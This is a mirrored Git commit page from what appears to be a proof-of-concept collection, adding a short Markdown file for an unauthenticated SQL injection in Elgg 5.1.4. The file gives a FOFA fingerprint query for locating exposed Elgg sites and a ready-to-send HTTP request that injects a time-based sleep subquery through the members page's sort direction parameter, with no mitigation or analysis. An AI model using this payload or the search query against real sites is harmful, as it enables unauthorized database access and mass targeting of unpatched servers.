admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #15 from Kazgangap/elgg

Browse Source 
Elgg sqli poc
This commit is contained in:
wy876 2024-08-22 17:45:07 +08:00 committed by GitHub
commit dccd39d921
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 14 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
Elgg/elgg-sqli.md Normal file
View File

@ -0,0 +1,14 @@
## Elgg 5.1.4 Sql Injection
## fofa
```
icon_hash="413602919"
```
## poc
```
GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
Host:
```
## Ref
- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md